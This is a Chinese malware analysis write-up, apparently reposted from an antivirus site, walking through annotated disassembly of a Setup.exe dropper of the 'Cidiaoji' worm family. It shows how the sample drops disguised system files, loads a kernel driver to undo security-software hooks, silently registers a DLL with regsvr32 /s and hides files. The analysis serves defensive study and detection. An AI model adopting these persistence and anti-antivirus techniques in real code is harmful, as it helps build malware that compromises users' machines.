文件: Setup.exe
大小: 159744 字节
修改时间: 2008年2月25日, 02:46:28
MD5: E4284D269C5FE7C4F3D1EF9D24AE2077
SHA1: F315C0DE3C095126ED1693F1EC6689F227FFA4E2
CRC32: 80A32F35
加壳:UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo
编写语言:Microsoft Visual C++ 6.0
写在前面:
花了几天时间,参考了几个高手的分析,才有了这个残篇,在这里向以下几位表示感谢:轩辕小聪(答阳光,关于pagefile_pif对付安全软件行为的实现举例),loveboom(熊猫烧香病毒分析及解决方案),孤独更可靠(磁碟机变种简单分析(lsass.exe、smss.exe、dnsq.dll、NetApi000.sys)),清新阳光(新年伊始警惕“磁碟机”新变种(LSASS.exe,SMSS.exe,netcfg.dll,pagefile.pif)(征集更好的查杀方法))
/zuixinbingdu/2008/0213/2475.html
学习过程中还有很多东西不明不白,估计有很多地方跟出来的结果可能还是错的,只能慢慢来了。虽然这只是残篇,权作自我激励吧。以下就是本篇的主要内容:
1. 用 CreateMutexA 创建一个互斥量,通过它判断病毒是否已经在内存中运行
.text:004057FC 68 E0 C7 40 00 push offset s_Cnjbla ; "CNJBla"
.text:00405801 8D 4D 90 lea ecx, [ebp+var_70]
.text:00405804 C6 45 FC 3A mov byte ptr [ebp+var_4], 3Ah
.text:00405808 E8 C3 20 00 00 call CString::operator=(char const *)
.text:00405808
.text:0040580D 68 D8 C7 40 00 push offset s_Ipboff ; "ipbofF"
.text:00405812 8D 4D 90 lea ecx, [ebp+var_70]
.text:00405815 E8 CE 20 00 00 call CString::operator+=(char const *)
.text:00405815
.text:0040581A FF 75 90 push [ebp+var_70] ; lpName
.text:0040581D 6A 01 push 1 ; bInitialOwner
.text:0040581F 53 push ebx ; lpMutexAttributes
.text:00405820 FF 15 A4 90 40 00 call ds:CreateMutexA ; |pSecurity = NULL
.text:00405820 ; |InitialOwner = TRUE
.text:00405820 ; \MutexName = "CNJBlaipbofF"
.text:00405820
2. 释放文件(有几个跟丢了 ^_^ )
病毒主要是读取自身的资源,然后把它们释放成文件来害人,以下是资源与释放文件的对照:
\ResourceType = "sexe"
|ResourceName = C4=196号资源
|FileName = "C:\winnt\system32\com\smss.exe"
|Access = GENERIC_WRITE
|ShareMode = 0
|pSecurity = NULL
|Mode = CREATE_ALWAYS
|Attributes = 0
\hTemplateFile = NULL
\ResourceType = "sexa"
|ResourceName = C0=192号资源
|FileName = "C:\winnt\system32\com\netcfg.000"
|Access = GENERIC_WRITE
|ShareMode = 0
|pSecurity = NULL
|Mode = CREATE_ALWAYS
|Attributes = 0
\hTemplateFile = NULL
resource=sexh
|FileName = "C:\winnt\system32\com\lsass.exe"
\ResourceType = "sexs"
|ResourceName = C2=194号资源
|FileName = "C:\NetApi000.sys"
|Access = GENERIC_WRITE
|ShareMode = 0
|pSecurity = NULL
|Mode = CREATE_ALWAYS
|Attributes = 0
\hTemplateFile = NULL
\ResourceType = "sexp"
|ResourceName = C1=193号资源
|FileName = "c:\pagefile.exe"
|Access = GENERIC_WRITE
|ShareMode = 0
|pSecurity = NULL
|Mode = CREATE_ALWAYS
|Attributes = 0
\hTemplateFile = NULL
\ResourceType = "sexh"
|ResourceName = C3=195号资源
|FileName = "C:\winnt\system32\dnsq.dll"
|Access = GENERIC_WRITE
|ShareMode = 0
|pSecurity = NULL
|Mode = CREATE_ALWAYS
|Attributes = 0
\hTemplateFile = NULL
具体实现的反汇编代码如下:FindResourceA 定位资源,SizeofResource 计算资源大小,LoadResource/LockResource 装载并锁定资源,处理后由 WriteFile 写入文件 ^_^
..text:00403B42 68 C4 C6 40 00 push offset s_Sexe ; "sexe"
.text:00403B47 E8 CC 3D 00 00 call CString::CString(char const *)
.text:00403B47
.text:00403B4C 68 C4 00 00 00 push 0C4h ; hObject
.text:00403B51 51 push ecx ; lpFileName
.text:00403B52 8D 45 08 lea eax, [ebp+lpFileName]
.text:00403B55 8B CC mov ecx, esp
.text:00403B57 89 65 EC mov [ebp+var_14], esp
.text:00403B5A 50 push eax
.text:00403B5B C6 45 FC 01 mov byte ptr [ebp+var_4], 1
.text:00403B5F E8 72 3D 00 00 call CString::CString(CString const &)
.text:00403B5F
.text:00403B64 80 65 FC 00 and byte ptr [ebp+var_4], 0
.text:00403B68 8B CE mov ecx, esi
.text:00403B6A E8 99 F7 FF FF call process_resources
.text:00403308 process_resources proc near ; CODE XREF: sub_403B09+61p
.text:00403308 ; sub_403DF4+7B3p
.text:00403308 ; sub_403DF4+10DDp
.text:00403308 ; sub_403DF4+18A4p
.text:00403308 ; sub_403DF4+1DABp
.text:00403308
.text:00403308 NumberOfBytesWritten= dword ptr -14h
.text:00403308 hResData= dword ptr -10h
.text:00403308 var_C= dword ptr -0Ch
.text:00403308 var_4= dword ptr -4
.text:00403308 lpFileName= dword ptr 8
.text:00403308 hObject= dword ptr 0Ch
.text:00403308 lpType= dword ptr 10h
.text:00403308
.text:00403308 B8 84 81 40 00 mov eax, offset __ehhandler$?CreateNewChild@CMDIFrameWnd@@QAEPAVCMDIChildWnd@@PAUCRuntimeClass@@IPAUHMENU__@@PAUHACCEL__@@@Z
.text:0040330D E8 AE 46 00 00 call _EH_prolog
.text:0040330D
.text:00403312 51 push ecx
.text:00403313 51 push ecx
.text:00403314 53 push ebx
.text:00403315 56 push esi
.text:00403316 57 push edi
.text:00403317 33 FF xor edi, edi
.text:00403319 89 7D FC mov [ebp+var_4], edi
.text:0040331C 0F B7 45 0C movzx eax, word ptr [ebp+hObject]
.text:00403320 FF 75 10 push [ebp+lpType] ; lpType
.text:00403323 50 push eax ; lpName
.text:00403324 57 push edi ; hModule
.text:00403325 FF 15 64 90 40 00 call ds:FindResourceA ; |hModule = NULL
.text:00403325 ; |ResourceName = C4
.text:00403325 ; \ResourceType = "sexe"
.text:00403325 ;
.text:00403325
.text:0040332B 8B D8 mov ebx, eax
.text:0040332D 3B DF cmp ebx, edi
.text:0040332F 0F 84 CA 00 00 00 jz loc_4033FF
.text:0040332F
.text:00403335 53 push ebx ; hResInfo
.text:00403336 57 push edi ; hModule
.text:00403337 FF 15 70 90 40 00 call ds:SizeofResource ; |hModule = NULL
.text:00403337 ; \hResource = 0040F0C8
.text:00403337 ;
.text:00403337
.text:0040333D 53 push ebx ; hResInfo
.text:0040333E 57 push edi ; hModule
.text:0040333F 8B F0 mov esi, eax
.text:00403341 FF 15 68 90 40 00 call ds:LoadResource ; |hModule = NULL
.text:00403341 ; \hResource = 0040F188
.text:00403341
.text:00403347 3B C7 cmp eax, edi ; edi=00000000
.text:00403347 ; eax=00415890 (Setup.00415890)
.text:00403347 ;
.text:00403349 89 45 F0 mov [ebp+hResData], eax
.text:0040334C 0F 84 AD 00 00 00 jz loc_4033FF
.text:0040334C
.text:00403352 57 push edi ; hTemplateFile
.text:00403353 57 push edi ; dwFlagsAndAttributes
.text:00403354 6A 02 push 2 ; dwCreationDisposition
.text:00403356 57 push edi ; lpSecurityAttributes
.text:00403357 57 push edi ; dwShareMode
.text:00403358 68 00 00 00 40 push 40000000h ; dwDesiredAccess
.text:0040335D FF 75 08 push [ebp+lpFileName] ; lpFileName
.text:00403360 FF 15 E0 90 40 00 call ds:CreateFileA ; |FileName = "C:\winnt\system32\com\smss.exe"
.text:00403360 ; |Access = GENERIC_WRITE
.text:00403360 ; |ShareMode = 0
.text:00403360 ; |pSecurity = NULL
.text:00403360 ; |Mode = CREATE_ALWAYS
.text:00403360 ; |Attributes = 0
.text:00403360 ; \hTemplateFile = NULL
.text:00403360
.text:00403366 3B C7 cmp eax, edi ; edi=00000000
.text:00403366 ; eax=000001AC
.text:00403366 ;
.text:00403368 89 45 0C mov [ebp+hObject], eax
.text:0040336B 0F 84 8E 00 00 00 jz loc_4033FF
.text:0040336B
.text:00403371 8B 1D 70 93 40 00 mov ebx, ds:malloc
.text:00403377 56 push esi ; Size=1001 (4097.)
.text:00403378 FF D3 call ebx ; malloc
.text:00403378
.text:0040337A 56 push esi ; Size
.text:0040337B 8B F8 mov edi, eax
.text:0040337D FF D3 call ebx ; malloc
.text:0040337D
.text:0040337F 59 pop ecx
.text:00403380 8B D8 mov ebx, eax
.text:00403382 85 FF test edi, edi
.text:00403384 59 pop ecx
.text:00403385 74 76 jz short loc_4033FD
.text:00403385
.text:00403387 85 DB test ebx, ebx
.text:00403389 74 72 jz short loc_4033FD
.text:00403389
.text:0040338B 56 push esi ; Size= 1001 (4097.)
.text:0040338C FF 75 F0 push [ebp+hResData] ; hResData=Handles = 415890 (4282512.)
.text:0040338F FF 15 6C 90 40 00 call ds:LockResource
.text:0040338F
.text:00403395 50 push eax ; Src=Setup.00415890
.text:00403396 53 push ebx ; Dst=00348060
.text:00403397 E8 3C 46 00 00 call memcpy ; |dest = 00348060
.text:00403397 ; |src = Setup.00415890
.text:00403397 ; \n = 1001 (4097.)
.text:00403397 ;
.text:00403397
.text:0040339C 83 C4 0C add esp, 0Ch
.text:0040339F 33 C9 xor ecx, ecx
.text:004033A1 85 F6 test esi, esi
.text:004033A3 76 0F jbe short loc_4033B4
.text:004033A3
.text:004033A5 8D 44 33 FF lea eax, [ebx+esi-1]
.text:004033A5
.text:004033A9
.text:004033A9 loc_4033A9: ; CODE XREF: process_resources+AAj
.text:004033A9 8A 10 mov dl, [eax] ; ds:[00349060]=0D (Carriage Return)
.text:004033A9 ; dl=01
.text:004033A9 ;
.text:004033AB 88 14 39 mov [ecx+edi], dl ; dl=0D (Carriage Return)
.text:004033AB ; ds:[01208470]=0D (Carriage Return)
.text:004033AE 41 inc ecx
.text:004033AF 48 dec eax
.text:004033B0 3B CE cmp ecx, esi
.text:004033B2 72 F5 jb short loc_4033A9
.text:004033B2
.text:004033B4
.text:004033B4 loc_4033B4: ; CODE XREF: process_resources+9Bj
.text:004033B4 33 C0 xor eax, eax
.text:004033B6 80 3F 0D cmp byte ptr [edi], 0Dh
.text:004033B9 75 16 jnz short loc_4033D1
.text:004033B9
.text:004033BB 6A 01 push 1
.text:004033BD 59 pop ecx
.text:004033BE 3B F1 cmp esi, ecx
.text:004033C0 8B C1 mov eax, ecx
.text:004033C2 76 0D jbe short loc_4033D1
.text:004033C2
.text:004033C4
.text:004033C4 loc_4033C4: ; CODE XREF: process_resources+C7j
.text:004033C4 8A 14 39 mov dl, [ecx+edi]
.text:004033C7 F6 D2 not dl
.text:004033C9 88 14 39 mov [ecx+edi], dl
.text:004033CC 41 inc ecx
.text:004033CD 3B CE cmp ecx, esi
.text:004033CF 72 F3 jb short loc_4033C4
.text:004033CF
.text:004033D1
.text:004033D1 loc_4033D1: ; CODE XREF: process_resources+B1j
.text:004033D1 ; process_resources+BAj
.text:004033D1 8D 4D EC lea ecx, [ebp+NumberOfBytesWritten]
.text:004033D4 6A 00 push 0 ; lpOverlapped=NULL
.text:004033D6 2B F0 sub esi, eax ; eax=00000001
.text:004033D6 ; esi=00001001
.text:004033D8 51 push ecx ; lpNumberOfBytesWritten=ecx=0012E098
.text:004033D8 ;
.text:004033D9 03 C7 add eax, edi ; edi=01208470
.text:004033D9 ; eax=00000001
.text:004033DB 56 push esi ; nNumberOfBytesToWrite=esi=00001000
.text:004033DC 50 push eax ; lpBuffer=eax=01208471
.text:004033DD FF 75 0C push [ebp+hObject] ; hFile=堆栈 ss:[0012E0B8]=000001AC
.text:004033E0 FF 15 90 90 40 00 call ds:WriteFile ; |hFile = 000001AC
.text:004033E0 ; |Buffer = 01208471
.text:004033E0 ; |nBytesToWrite = 1000 (4096.)
.text:004033E0 ; |pBytesWritten = 0012E098
.text:004033E0
.text:004033E6 57 push edi ; Memory
.text:004033E7 8B F0 mov esi, eax
.text:004033E9 FF 15 78 93 40 00 call ds:free
.text:004033E9
.text:004033EF 59 pop ecx
.text:004033F0 FF 75 0C push [ebp+hObject] ; hObject=堆栈 ss:[0012E0B8]=000001AC
.text:004033F3 FF 15 60 90 40 00 call ds:CloseHandle
2.2 通过 OpenSCManagerA、CreateServiceA、StartServiceA 几个服务相关的 API 把 NetApi000.sys 作为内核驱动服务加载并启动,用来还原被安全软件 hook 的 SSDT。
text:00402064 sub_402064 proc near ; CODE XREF: sub_403DF4+10FCp
.text:00402064
.text:00402064 BinaryPathName= byte ptr -104h
.text:00402064
.text:00402064 55 push ebp
.text:00402065 8B EC mov ebp, esp
.text:00402067 81 EC 04 01 00 00 sub esp, 104h
.text:0040206D 56 push esi
.text:0040206E 8D 85 FC FE FF FF lea eax, [ebp+BinaryPathName]
.text:00402074 FF 35 B8 D0 40 00 push Source ; Source="C:\NetApi000.sys")
.text:0040207A 50 push eax ; Dest=eax=0012DFAC
.text:0040207B E8 4C 59 00 00 call strcpy ; |dest = 0012DFAC
.text:0040207B ; \src = "C:\NetApi000.sys"
.text:0040207B
.text:00402080 8D 85 FC FE FF FF lea eax, [ebp+BinaryPathName] ; eax=0012DFAC, (ASCII "C:\NetApi000.sys")
.text:00402086 50 push eax ; lpBinaryPathName
.text:00402087 E8 F2 FE FF FF call sub_401F7E ; eax=0012DFAC, (ASCII "C:\NetApi000.sys")
.text:00402087
.text:0040208C 8B F0 mov esi, eax
.text:0040208E 83 C8 FF or eax, 0FFFFFFFFh
.text:00402091 83 C4 0C add esp, 0Ch
.text:00402094 3B F0 cmp esi, eax ; eax=FFFFFFFF esi=FFFFFFFF
.text:00402096 74 10 jz short loc_4020A8
.text:00402096
.text:00402098 56 push esi ; hDevice
text:00401F7E sub_401F7E proc near ; CODE XREF: sub_402064+23p
.text:00401F7E ; Registers the dropped file at lpBinaryPathName as a kernel-driver
.text:00401F7E ; service, starts it, and opens its device object. Steps visible below:
.text:00401F7E ;   OpenSCManagerA -> CreateServiceA "NetApi000" (SERVICE_KERNEL_DRIVER,
.text:00401F7E ;   SERVICE_DEMAND_START) -> OpenServiceA fallback when the service
.text:00401F7E ;   already exists -> StartServiceA -> CreateFileA "\\.\NetApi000DOS".
.text:00401F7E ; Argument: lpBinaryPathName ([esp+4]) = path of the driver file.
.text:00401F7E ; Returns (eax): the handle from CreateFileA on the device, or
.text:00401F7E ;   INVALID_HANDLE_VALUE (-1) when OpenSCManagerA fails. That is the only
.text:00401F7E ;   failure the routine checks; CreateServiceA/StartServiceA/CreateFileA
.text:00401F7E ;   errors are not checked here (the caller sub_402064 only compares the
.text:00401F7E ;   result with -1).
.text:00401F7E ; Defender note: the service name "NetApi000", the driver path and the
.text:00401F7E ;   device name "\\.\NetApi000DOS" are host indicators for this sample;
.text:00401F7E ;   kernel-driver service creation from a file in the drive root is the
.text:00401F7E ;   behaviour to alert on.
.text:00401F7E
.text:00401F7E lpBinaryPathName= dword ptr 4
.text:00401F7E
.text:00401F7E 55 push ebp
.text:00401F7F 56 push esi
.text:00401F80 57 push edi
.text:00401F81 33 F6 xor esi, esi ; esi = 0, reused for every NULL/0 argument below
.text:00401F83 6A 02 push 2 ; dwDesiredAccess = 2 = SC_MANAGER_CREATE_SERVICE
.text:00401F85 56 push esi ; lpDatabaseName = NULL
.text:00401F86 56 push esi ; lpMachineName = NULL (local machine)
.text:00401F87 83 CF FF or edi, 0FFFFFFFFh ; edi = -1: default return value (INVALID_HANDLE_VALUE)
.text:00401F8A FF 15 2C 90 40 00 call ds:OpenSCManagerA
.text:00401F8A
.text:00401F90 8B E8 mov ebp, eax ; ebp = hSCManager
.text:00401F92 3B EE cmp ebp, esi
.text:00401F94 74 68 jz short loc_401FFE ; SCM not opened -> return edi (-1) unchanged
.text:00401F94
.text:00401F96 53 push ebx
.text:00401F97 56 push esi ; lpPassword=null
.text:00401F98 56 push esi ; lpServiceStartName=NULL
.text:00401F99 56 push esi ; lpDependencies=NULL
.text:00401F9A 56 push esi ; lpdwTagId=NULL
.text:00401F9B 56 push esi ; lpLoadOrderGroup=NULL
.text:00401F9C FF 74 24 28 push [esp+24h+lpBinaryPathName] ; lpBinaryPathName=ASCII "C:\NetApi000.sys"
.text:00401FA0 BF F8 C3 40 00 mov edi, offset ServiceName ; "NetApi000" (same string used as service and display name; overwrites the -1 default)
.text:00401FA5 56 push esi ; dwErrorControl = 0 = SERVICE_ERROR_IGNORE
.text:00401FA6 6A 03 push 3 ; dwStartType = 3 = SERVICE_DEMAND_START
.text:00401FA8 6A 01 push 1 ; dwServiceType = 1 = SERVICE_KERNEL_DRIVER
.text:00401FAA 6A 10 push 10h ; dwDesiredAccess = 10h = SERVICE_START
.text:00401FAC 57 push edi ; lpDisplayName
.text:00401FAD 57 push edi ; lpServiceName
.text:00401FAE 55 push ebp ; hSCManager=ebp=00152660
.text:00401FAF FF 15 28 90 40 00 call ds:CreateServiceA ; args:
.text:00401FAF ; |hManager = 00152660
.text:00401FAF ; |ServiceName = "NetApi000"
.text:00401FAF ; |DisplayName = "NetApi000"
.text:00401FAF ; |DesiredAccess = SERVICE_START
.text:00401FAF ; |ServiceType = SERVICE_KERNEL_DRIVER
.text:00401FAF ; |StartType = SERVICE_DEMAND_START
.text:00401FAF ; |ErrorControl = SERVICE_ERROR_IGNORE
.text:00401FAF ; |BinaryPathName = "C:\NetApi000.sys"
.text:00401FAF ; |LoadOrderGroup = NULL
.text:00401FAF ; |pTagId = NULL
.text:00401FAF ; |pDependencies = NULL
.text:00401FAF ; |ServiceStartName = NULL
.text:00401FAF ; \Password = NULL
.text:00401FAF
.text:00401FB5 8B D8 mov ebx, eax ; ebx = hService (NULL when CreateServiceA failed)
.text:00401FB7 FF 15 44 90 40 00 call ds:GetLastError
.text:00401FB7
.text:00401FBD 3D 31 04 00 00 cmp eax, 431h ; 431h = 1073 = ERROR_SERVICE_EXISTS
.text:00401FC2 75 0C jnz short loc_401FD0 ; success or any other error: continue with ebx as-is (possibly NULL)
.text:00401FC2
.text:00401FC4 6A 10 push 10h ; dwDesiredAccess = SERVICE_START
.text:00401FC6 57 push edi ; lpServiceName = "NetApi000"
.text:00401FC7 55 push ebp ; hSCManager
.text:00401FC8 FF 15 24 90 40 00 call ds:OpenServiceA ; service already registered from an earlier run: open it instead
.text:00401FC8
.text:00401FCE 8B D8 mov ebx, eax ; ebx = hService
.text:00401FCE
.text:00401FD0
.text:00401FD0 loc_401FD0: ; CODE XREF: sub_401F7E+44j
.text:00401FD0 56 push esi ; lpServiceArgVectors = NULL
.text:00401FD1 56 push esi ; dwNumServiceArgs = 0
.text:00401FD2 53 push ebx ; hService (not validated; may be NULL)
.text:00401FD3 FF 15 20 90 40 00 call ds:StartServiceA ; loads the driver; return value is not checked
.text:00401FD3
.text:00401FD9 56 push esi ; hTemplateFile
.text:00401FDA 56 push esi ; dwFlagsAndAttributes
.text:00401FDB 6A 03 push 3 ; dwCreationDisposition = 3 = OPEN_EXISTING
.text:00401FDD 56 push esi ; lpSecurityAttributes
.text:00401FDE 56 push esi ; dwShareMode
.text:00401FDF 68 00 00 00 C0 push 0C0000000h ; dwDesiredAccess = GENERIC_READ|GENERIC_WRITE
.text:00401FE4 68 E4 C3 40 00 push offset FileName ; "\\\\.\\NetApi000DOS" -- the driver's device object
.text:00401FE9 FF 15 E0 90 40 00 call ds:CreateFileA ; args:
.text:00401FE9 ; |FileName = "\\.\NetApi000DOS"
.text:00401FE9 ; |Access = GENERIC_READ|GENERIC_WRITE
.text:00401FE9 ; |ShareMode = 0
.text:00401FE9 ; |pSecurity = NULL
.text:00401FE9 ; |Mode = OPEN_EXISTING
.text:00401FE9 ; |Attributes = 0
.text:00401FE9 ; \hTemplateFile = NULL
.text:00401FE9
.text:00401FEF 8B 35 1C 90 40 00 mov esi, ds:CloseServiceHandle
.text:00401FF5 53 push ebx ; hSCObject = hService
.text:00401FF6 8B F8 mov edi, eax ; edi = device handle from CreateFileA (becomes the return value, -1 if it failed)
.text:00401FF8 FF D6 call esi ; CloseServiceHandle
.text:00401FF8
.text:00401FFA 55 push ebp ; hSCObject = hSCManager
.text:00401FFB FF D6 call esi ; CloseServiceHandle
.text:00401FFB
.text:00401FFD 5B pop ebx
.text:00401FFD
.text:00401FFE
.text:00401FFE loc_401FFE: ; CODE XREF: sub_401F7E+16j
.text:00401FFE 8B C7 mov eax, edi ; return the device handle, or -1 when OpenSCManagerA failed
.text:00402000 5F pop edi
.text:00402001 5E pop esi
.text:00402002 5D pop ebp
.text:00402003 C3 retn
.text:00402003
.text:00402003 sub_401F7E endp
2.2.1 用 CopyFileA 把 netcfg.000 复制一份为 netcfg.dll(bFailIfExists = FALSE,目标已存在则覆盖)
text:004056C4 53 push ebx ; bFailIfExists
.text:004056C5 FF 75 E8 push [ebp+var_18] ; lpNewFileName
.text:004056C8 50 push eax ; lpExistingFileName
.text:004056C9 FF 15 00 91 40 00 call ds:CopyFileA ; |ExistingFileName = "C:\winnt\system32\com\netcfg.000"
.text:004056C9 ; |NewFileName = "C:\winnt\system32\com\netcfg.dll"
.text:004056C9 ; \FailIfExists = FALSE
2.2.2 通过 ShellExecuteA 调用系统的 regsvr32.exe 静默注册 netcfg.dll(参数 /s,窗口不显示)
text:00405747 68 F8 C7 40 00 push offset s_Cfg_dllS ; "cfg.dll /s"
.text:0040574C 50 push eax
.text:0040574D 8D 45 E8 lea eax, [ebp+var_18]
.text:00405750 C6 45 FC 39 mov byte ptr [ebp+var_4], 39h
.text:00405754 50 push eax
.text:00405755 E8 A6 21 00 00 call operator+(CString const &,char const *)
.text:00405755
.text:0040575A 8B 00 mov eax, [eax]
.text:0040575C 53 push ebx ; nShowCmd
.text:0040575D 53 push ebx ; lpDirectory
.text:0040575E 50 push eax ; lpParameters
.text:0040575F 68 E8 C7 40 00 push offset s_Regsvr32_exe ; "regsvr32.exe"
.text:00405764 53 push ebx ; lpOperation
.text:00405765 53 push ebx ; hwnd
.text:00405766 FF 15 AC 93 40 00 call ds:ShellExecuteA ; |hWnd = NULL
.text:00405766 ; |Operation = NULL
.text:00405766 ; |FileName = "regsvr32.exe"
.text:00405766 ; |Parameters = "C:\winnt\system32\com\netcfg.dll /s"
.text:00405766 ; |DefDir = NULL
.text:00405766 ; \IsShown = 0
2.2.3 用 SetFileAttributesA 把 netcfg.000 和 netcfg.dll 的文件属性设置为(系统|隐藏)
text:0040578E 8B 00 mov eax, [eax]
.text:00405790 6A 06 push 6 ; dwFileAttributes
.text:00405792 50 push eax ; lpFileName
.text:00405793 FF 15 EC 90 40 00 call ds:SetFileAttributesA ; |FileName = "C:\winnt\system32\com\netcfg.000"
.text:00405793 ; \FileAttributes = HIDDEN|SYSTEM
.text:00405793
.text:00405799 8D 4D E8 lea ecx, [ebp+var_18]
.text:0040579C E8 21 20 00 00 call CString::~CString(void)
.text:0040579C
.text:004057A1 8D 45 B8 lea eax, [ebp+var_48]
.text:004057A4 50 push eax
.text:004057A5 8D 45 E8 lea eax, [ebp+var_18]
.text:004057A8 57 push edi
.text:004057A9 50 push eax
.text:004057AA E8 4B 21 00 00 call operator+(CString const &,CString const &)
.text:004057AA
.text:004057AF 8B 00 mov eax, [eax]
.text:004057B1 6A 06 push 6 ; dwFileAttributes
.text:004057B3 50 push eax ; lpFileName
.text:004057B4 FF 15 EC 90 40 00 call ds:SetFileAttributesA ; |FileName = "C:\winnt\system32\com\netcfg.dll"
.text:004057B4 ; \FileAttributes = HIDDEN|SYSTEM
Tags:Setup.exe
来源:爱毒霸